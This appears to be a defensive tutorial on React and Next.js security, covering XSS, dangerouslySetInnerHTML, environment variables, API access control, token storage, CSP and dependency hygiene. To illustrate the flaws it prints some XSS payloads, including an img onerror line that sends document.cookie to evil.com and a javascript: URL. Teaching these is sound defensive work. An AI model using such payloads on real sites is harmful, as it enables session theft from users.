Why Frontend Security Is Systematically Underestimated
There's a persistent myth in web development: security is a backend concern. The frontend just renders things. What's the worst that could happen?
Quite a lot, it turns out.
Frontend vulnerabilities are responsible for some of the most damaging breaches in web history. The 2018 British Airways breach exfiltrated roughly 500,000 customers' payment details entirely through injected client-side scripts, and the Ticketmaster breach the same year followed the same playbook. Magecart, the threat group behind both incidents and dozens of other supply chain attacks, operates almost exclusively at the JavaScript layer.
React's architecture provides meaningful security protections out of the box — but they're not magic, they have clear limits, and developers bypass them constantly without realizing the consequences.
This guide covers the specific vulnerabilities most React developers encounter, why they exist, and how to close them properly.
1. XSS in React: The Default Protections and Their Limits
Cross-Site Scripting (XSS) remains the most common web vulnerability year after year. It happens when an attacker gets their script to execute in a victim's browser in the context of your application — giving it access to cookies, tokens, DOM content, and everything your JS can touch.
What React Does Right by Default
React's JSX template system escapes values before rendering them. This is not a convention — it's baked into the reconciler. When you write:
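Something like the following (an illustrative snippet; userInput stands in for any attacker-controlled string):

```jsx
const userInput = '<script>alert(document.cookie)</script>';
return <div>{userInput}</div>; // displayed as literal text; the script never runs
```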
React renders that as the literal text string, not as HTML. The <script> tag never executes. Under the hood, React assigns content via textContent or createTextNode, not innerHTML, which means the browser never parses it as markup.
This protection is automatic and default. You have to actively work to break it.
How React's XSS Protection Breaks Down
DOM-based XSS via third-party libraries: React controls its own rendering, but it doesn't control what happens when you hand data to a third-party library that manipulates the DOM directly — a rich text editor, a chart library, a mapping SDK. These libraries often use innerHTML internally. If you pass unsanitized user data into them, React's protections are irrelevant.
// Dangerous: charting library writes to DOM directly
myChartLib.setTitle(userInput); // ← library uses innerHTML internally
URL injection in href and src: React escapes HTML, but it doesn't validate URLs. The javascript: protocol is valid HTML and a classic XSS vector.
// This renders and executes
const url = "javascript:alert(document.cookie)";
return <a href={url}>Click me</a>; // ← XSS
Always validate URLs before using them in href, src, action, or similar attributes:
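A minimal validation helper (a sketch; SAFE_PROTOCOLS and safeUrl are hypothetical names, and the inert '#' fallback is one possible choice):

```typescript
// Allowlist of protocols considered safe for href/src.
// Assumption: this app only ever links via these schemes.
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

function safeUrl(raw: string): string {
  try {
    // The base URL lets relative paths like "/dashboard" parse successfully.
    const parsed = new URL(raw, 'https://example.com');
    return SAFE_PROTOCOLS.has(parsed.protocol) ? raw : '#';
  } catch {
    return '#'; // unparseable input gets an inert fallback
  }
}
```

Then render with `<a href={safeUrl(userSuppliedUrl)}>` instead of passing the raw value through.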
Server-Side Rendering (SSR) deserialization: In Next.js and other SSR frameworks, state is often serialized into the HTML for hydration. If that serialization is done naively:
<!-- Dangerous pattern in _document.tsx or similar -->
<script>window.__STATE__ = ${JSON.stringify(state)}</script>
If state contains a string like </script><script>alert(1)</script>, you've broken out of the script tag. Use a serializer that escapes <, >, and & inside JSON strings, or use a library like serialize-javascript.
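A minimal escaping serializer (a sketch; serializeState is a hypothetical helper, and production code should prefer serialize-javascript, which also covers edge cases such as U+2028/U+2029):

```typescript
// Escape the characters that could terminate the <script> tag.
// The replacements are valid JSON escapes, so JSON.parse round-trips cleanly.
function serializeState(state: unknown): string {
  return JSON.stringify(state)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

// Now safe to interpolate:
// <script>window.__STATE__ = ${serializeState(state)}</script>
```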
2. dangerouslySetInnerHTML: When You Really Need It, and When You Think You Do
The name is the documentation. React engineers didn't call it setInnerHTML — they called it dangerouslySetInnerHTML to force you to pause and think.
When you use it, you're telling React: I know what I'm doing, skip the escaping, write this HTML directly. React obliges without question.
// This executes arbitrary JavaScript
const html = { __html: '<img src=x onerror="fetch(`https://evil.com?c=`+document.cookie)">' };
return <div dangerouslySetInnerHTML={html} />;
Legitimate Use Cases
dangerouslySetInnerHTML is appropriate when:
Rendering HTML from a CMS or rich-text editor where the content is controlled by you, not end users
Rendering pre-sanitized HTML from a trusted source
Embedding SVG or mathematical notation (MathJax, KaTeX output)
It is never appropriate when the HTML content originates from user input, URL parameters, third-party APIs you don't control, or any untrusted source.
Sanitize Before You Render
When you genuinely need to render HTML from a less-than-fully-trusted source, sanitize it first using a battle-tested library:
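For example, with DOMPurify (the allowlists below are illustrative; tune them to the markup your content actually needs):

```jsx
import DOMPurify from 'dompurify';

function SafeHtml({ untrustedHtml }) {
  const clean = DOMPurify.sanitize(untrustedHtml, {
    ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li'],
    ALLOWED_ATTR: ['href', 'title'],
  });
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
```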
Allowlist, never blocklist: Specify what's allowed, not what's forbidden. Attacker creativity will always outpace your blocklist.
Sanitize server-side too: DOMPurify runs in the browser. For SSR paths, run sanitization on the server using isomorphic-dompurify or a Node-compatible sanitizer.
Audit your ALLOWED_ATTR: href with javascript: is still dangerous. Add an afterSanitizeAttributes hook if you need to validate URL attributes post-sanitization.
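Such a hook might look like this (a sketch; the protocol regex is an assumption about which schemes your app allows):

```javascript
import DOMPurify from 'dompurify';

// Runs after DOMPurify's own attribute pass; strips href values
// that don't match an explicit allowlist of schemes.
DOMPurify.addHook('afterSanitizeAttributes', (node) => {
  if (node.hasAttribute && node.hasAttribute('href')) {
    const href = node.getAttribute('href') || '';
    if (!/^(https?:|mailto:|\/)/i.test(href)) {
      node.removeAttribute('href');
    }
  }
});
```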
3. Environment Variables: What's Actually Public and What Isn't
This is the most frequently misunderstood security topic in React development. Developers see the .env file pattern, assume it provides secrecy, and leak credentials into production.
The Fundamental Rule
In any bundled React application, any value you include in your client-side bundle is public. There are no secrets in the frontend. The build process inlines environment variables into your JavaScript. Anyone can open DevTools, view the source, or unpack your JS bundle and read them.
In Next.js, the convention makes this explicit:
# .env.local
# PRIVATE — never sent to the browser, only available in Node.js server contexts
DATABASE_URL=postgresql://user:password@host/db
STRIPE_SECRET_KEY=sk_live_...
JWT_SECRET=your-signing-secret
# PUBLIC — prefixed with NEXT_PUBLIC_, bundled into client JS, visible to everyone
NEXT_PUBLIC_API_BASE_URL=https://api.yourapp.com
NEXT_PUBLIC_STRIPE_PUBLISHABLE_KEY=pk_live_...
NEXT_PUBLIC_ANALYTICS_ID=G-XXXXXXXXXX
The NEXT_PUBLIC_ prefix isn't just a naming convention — it's a deliberate exposure signal. If a variable has that prefix, Next.js inlines it into the browser bundle at build time. If it doesn't, it's only accessible in getServerSideProps, API routes, server components, and other Node.js-side code.
Create React App uses REACT_APP_ for the same purpose. Vite uses VITE_.
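In practice (illustrative; the variable names match the .env example above):

```typescript
// Server-only code (API route, getServerSideProps, server component):
const dbUrl = process.env.DATABASE_URL;               // available: this runs in Node.js

// Client component code:
const apiBase = process.env.NEXT_PUBLIC_API_BASE_URL; // inlined into the bundle at build time
// process.env.DATABASE_URL would be undefined here, but referencing a
// secret anywhere in client code is still a red flag in review.
```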
What Belongs in Environment Variables
Safe to expose (NEXT_PUBLIC_):
Public API base URLs
Publishable API keys (Stripe publishable key, Segment write key, etc.)
Analytics tracking IDs
Feature flag service public keys
Map provider public tokens (Mapbox, Google Maps)
Never expose (no prefix, server-only):
Database connection strings
API secret keys of any kind
JWT signing secrets
OAuth client secrets
Private keys of any kind
Webhook secrets
Admin credentials
The Repository Leak Problem
.env.local and .env files must be in .gitignore. But .env.example — the template file developers commit to document required variables — must never contain real values:
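An .env.example with placeholders only (illustrative values):

```shell
# .env.example: safe to commit; documents required variables with dummy values
DATABASE_URL=postgresql://USER:PASSWORD@localhost:5432/DBNAME
STRIPE_SECRET_KEY=sk_test_replace_me
JWT_SECRET=change-me
NEXT_PUBLIC_API_BASE_URL=https://api.example.com
```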
Use secret scanning tools like git-secrets, truffleHog, or GitHub's native secret scanning to catch leaked credentials before they're pushed. Once a secret is committed to a repository — even if immediately removed — it's compromised. Rotate it immediately.
4. API Exposure: What Your Frontend Reveals About Your Backend
The React app itself is documentation for your API. Open DevTools, go to the Network tab, and interact with the application — every endpoint, every payload shape, every query parameter is visible. Attackers do this as a standard reconnaissance step.
This isn't a problem you can solve in the frontend. It's a constraint to design around.
Don't Rely on Obscurity
Hiding endpoint URLs, encoding payloads, or obfuscating your bundle does not constitute security. A motivated attacker will reverse it. Your API security posture must assume that every endpoint, parameter name, and response shape is known to attackers.
What This Means in Practice
Every API endpoint must authenticate and authorize on the server. Never trust the frontend to enforce access control. If your React app only shows the "Admin" button to admins, but your /api/admin/delete-user endpoint doesn't verify that the requesting user is an admin, you have a broken access control vulnerability (OWASP A01:2021 — the top web vulnerability).
// pages/api/admin/delete-user.ts (Next.js API route)
import type { NextApiRequest, NextApiResponse } from 'next';
import { getServerSession } from 'next-auth/next';
// Assumes the conventional next-auth setup; adjust the path to your project.
import { authOptions } from '../auth/[...nextauth]';

export default async function handler(req: NextApiRequest, res: NextApiResponse) {
  // Never skip this. Even if your UI "hides" admin routes.
  const session = await getServerSession(req, res, authOptions);
  if (!session) {
    return res.status(401).json({ error: 'Unauthorized' });
  }
  // session.user.role assumes you've added "role" via next-auth module augmentation.
  if (session.user.role !== 'admin') {
    return res.status(403).json({ error: 'Forbidden' });
  }
  // proceed with deletion
}
Don't expose internal IDs directly. If your URLs or API requests contain sequential numeric IDs (/api/users/1042), an attacker can iterate through them (Insecure Direct Object Reference, IDOR). Use UUIDs or other non-sequential identifiers, and always verify on the server that the requesting user has access to the specific resource.
Minimize API response payloads. Don't return entire database rows when you only need a few fields. A SELECT * that returns a user record with their hashed password, internal flags, and admin metadata — even if you "only display the name and email" in the UI — exposes that data to anyone watching network traffic.
// Bad: returns entire user object including sensitive fields
const user = await db.user.findUnique({ where: { id } });
return res.json(user);

// Good: explicit field selection
const user = await db.user.findUnique({
  where: { id },
  select: { id: true, name: true, email: true, avatarUrl: true },
});
return res.json(user);
CORS Configuration
Configure CORS carefully on your API. Allowing * (all origins) on any authenticated endpoint is a critical misconfiguration. Your production API should only accept requests from your production frontend origin:
// Restrictive CORS for production
const allowedOrigins = ['https://yourapp.com', 'https://www.yourapp.com'];
const origin = req.headers.origin;
if (allowedOrigins.includes(origin)) {
  res.setHeader('Access-Control-Allow-Origin', origin);
}
Note that CORS protects against cross-origin browser requests from other websites. It doesn't protect against direct requests using curl, Postman, or any non-browser client. Server-side authentication is still required.
5. Auth Handling: Tokens, Storage, and the Decisions That Haunt You
Authentication in React is an area with genuinely difficult trade-offs, a lot of cargo-culted advice, and consequences that are hard to reverse once you've shipped.
The Token Storage Debate: localStorage vs. Cookies
This is the most contested frontend security question, and the answer is more nuanced than most Stack Overflow threads suggest.
|                           | localStorage / sessionStorage | HttpOnly Cookies           |
|---------------------------|-------------------------------|----------------------------|
| XSS access                | ✗ Accessible via JS           | ✓ Inaccessible via JS      |
| CSRF risk                 | ✓ Not auto-sent               | ✗ Auto-sent with requests  |
| Expiry control            | Manual (JS-managed)           | Max-Age / Expires header   |
| Subdomain sharing         | Same-origin only              | Configurable               |
| Server-side revocation    | Requires token denylist       | Easier with session-based  |
| Implementation complexity | Lower                         | Moderate                   |
The strong recommendation: Store authentication tokens in HttpOnly, Secure, SameSite=Strict cookies. Here's why:
An HttpOnly cookie cannot be read by JavaScript — not by your code, not by injected attacker code. Even if an XSS vulnerability exists in your app, the attacker cannot exfiltrate the authentication token. localStorage provides zero such protection; any JavaScript running on your page can read it.
Secure: Only ever transmitted over HTTPS
SameSite=Strict: Not sent on cross-origin requests (primary CSRF protection)
Max-Age: Hard expiry enforced by the browser
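Setting such a cookie from an API route might look like this (a sketch; buildSessionCookie is a hypothetical helper, and the 15-minute Max-Age is an example value):

```typescript
// Build a hardened Set-Cookie header value.
function buildSessionCookie(token: string, maxAgeSeconds = 900): string {
  return [
    `session=${encodeURIComponent(token)}`,
    'HttpOnly',          // invisible to document.cookie and injected scripts
    'Secure',            // HTTPS only
    'SameSite=Strict',   // never sent on cross-site requests
    'Path=/',
    `Max-Age=${maxAgeSeconds}`,
  ].join('; ');
}

// In a Next.js API route:
// res.setHeader('Set-Cookie', buildSessionCookie(token));
```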
If You Must Use localStorage
If your architecture genuinely requires storing tokens in localStorage (some SPAs with multiple cross-origin API targets have legitimate reasons), apply defense-in-depth:
Implement a strict Content Security Policy to reduce XSS attack surface (more on this below)
Use short-lived access tokens (15 minutes) with refresh token rotation
Store the refresh token in an HttpOnly cookie even if the access token is in localStorage
Implement token binding or sender-constrained tokens where possible
Never Store Sensitive Data in localStorage at All
Beyond auth tokens, developers sometimes store sensitive data in localStorage for convenience — user PII, payment information, decoded JWT payloads containing role information. Don't. Consider localStorage a public billboard: everything in it is visible to any script running on your page.
JWT Claims and Client-Side Trust
If you're using JWTs and decoding them on the frontend to read user roles, display names, or permissions, that's fine for UI purposes. But never use client-side JWT claims to make authorization decisions. A JWT's payload is just base64-encoded JSON, so anyone can decode and modify it; tampering breaks the signature, but nothing on the client ever checks signatures. Always verify the JWT signature on the server and make authorization decisions there.
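Reading claims client-side for display purposes only (a sketch using Node's Buffer; in the browser you'd use atob with base64url translation):

```typescript
// Decode a JWT's payload WITHOUT verifying the signature.
// Fine for showing a display name; never a basis for authorization.
function decodeJwtPayload(token: string): Record<string, unknown> {
  const parts = token.split('.');          // header.payload.signature
  if (parts.length !== 3) throw new Error('not a JWT');
  const json = Buffer.from(parts[1], 'base64url').toString('utf8');
  return JSON.parse(json);
}
```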
6. Content Security Policy: Your Last Line of Defense
Content Security Policy (CSP) is an HTTP response header that tells the browser which sources of content — scripts, styles, images, fonts, frames — are legitimate. A properly configured CSP can neutralize XSS attacks even after they've been injected, because the browser refuses to execute scripts from unauthorized sources.
In Next.js, configure CSP in next.config.js via response headers:
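A static policy can be declared like this (illustrative; a per-request nonce, as recommended below, requires generating the header in middleware rather than static config):

```javascript
// next.config.js (illustrative static CSP; adjust sources to your app)
module.exports = {
  async headers() {
    return [
      {
        source: '/:path*',
        headers: [
          {
            key: 'Content-Security-Policy',
            value: [
              "default-src 'self'",
              "script-src 'self'",
              "frame-ancestors 'none'",
              "base-uri 'self'",
            ].join('; '),
          },
        ],
      },
    ];
  },
};
```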
default-src 'self': Fallback for all resource types — only same-origin allowed unless overridden
script-src 'nonce-...': Only scripts with a matching cryptographic nonce execute (use a per-request nonce, not a static value)
frame-ancestors 'none': Prevents your app from being embedded in iframes (clickjacking protection)
base-uri 'self': Prevents <base> tag injection attacks
Avoid 'unsafe-inline' and 'unsafe-eval' in script-src. These directives negate most of CSP's value. Next.js's nonce-based approach is the right way to allow inline scripts without opening the door to XSS.
Start with CSP in report-only mode (Content-Security-Policy-Report-Only) to catch violations before enforcing.
7. Additional Hardening: The Security Headers Checklist
Beyond CSP, several HTTP headers harden your application with minimal effort:
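A typical baseline (values are common defaults, shown in the shape Next.js's headers() config expects; adjust per application):

```typescript
// Common hardening headers beyond CSP.
const securityHeaders = [
  { key: 'X-Content-Type-Options', value: 'nosniff' },   // disable MIME sniffing
  { key: 'X-Frame-Options', value: 'DENY' },             // legacy clickjacking protection
  { key: 'Referrer-Policy', value: 'strict-origin-when-cross-origin' },
  { key: 'Strict-Transport-Security', value: 'max-age=63072000; includeSubDomains' },
  { key: 'Permissions-Policy', value: 'camera=(), microphone=(), geolocation=()' },
];
```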
Run your deployed app through securityheaders.com to audit your current header posture.
8. Dependency Security: The Attack Surface You Don't Own
Your React app doesn't just run your code. A typical React project has hundreds of transitive dependencies — code written by thousands of contributors, maintained with varying levels of security diligence.
Supply chain attacks against npm packages are increasingly common and effective. The event-stream incident (2018), the ua-parser-js compromise (2021), and numerous others demonstrate that a single compromised package can affect millions of applications.
Audit regularly:
npm audit
npm audit fix
Pin dependency versions in production (use exact versions or lock files committed to source control). Dependabot and Renovate can automate PRs for dependency updates with CI test coverage.
Prefer packages with:
Active maintenance and recent releases
High download counts and community scrutiny
Minimal transitive dependencies
Clear security disclosure policies
Subresource Integrity (SRI) for externally hosted scripts: if you load scripts from a CDN, add integrity and crossorigin attributes so the browser verifies the script hasn't been tampered with:
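For example (the hash is a placeholder; generate the real value from the exact file you serve, e.g. with openssl dgst -sha384 -binary lib.min.js | openssl base64 -A):

```html
<script
  src="https://cdn.example.com/lib.min.js"
  integrity="sha384-REPLACE_WITH_REAL_HASH"
  crossorigin="anonymous"
></script>
```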
Frontend security requires a fundamental perspective shift: your React code runs in an environment you don't control, on hardware you don't own, inside a browser that can be manipulated by extensions, injected scripts, and network-level attackers.
The React component tree is not a security boundary. The browser's JavaScript sandbox is not a security boundary. The only real security boundaries in web applications are:
The server — where authentication, authorization, and data access must be enforced
The network — where TLS, CORS, and HSTS apply
The browser's security primitives — CSP, SameSite cookies, HttpOnly — when used correctly
Every other "protection" in your frontend is UX, not security.
That said, frontend security is not pointless — it's defense-in-depth. Reducing XSS attack surface, protecting tokens from JS access, configuring CSP, auditing dependencies — these measures significantly raise the cost of attacks and stop the vast majority of opportunistic threats.
Security isn't a feature you add. It's a discipline you build into every decision, from how you store a token to how you render a string.
Quick Reference: React Security Checklist
Never use dangerouslySetInnerHTML with unsanitized user input
Validate all URLs before using them in href, src, or action attributes
Store auth tokens in HttpOnly, Secure, SameSite=Strict cookies
Never store secrets, API keys, or sensitive data in localStorage
Prefix only genuinely public values with NEXT_PUBLIC_ (or REACT_APP_, VITE_)
Add .env*.local to .gitignore; use placeholder values in .env.example
Enforce authentication and authorization on every API endpoint, server-side
Use UUIDs or non-sequential IDs to prevent IDOR attacks
Minimize API response payloads — return only fields the client needs
Configure CORS to allowlist specific origins only
Implement Content Security Policy with nonces, not unsafe-inline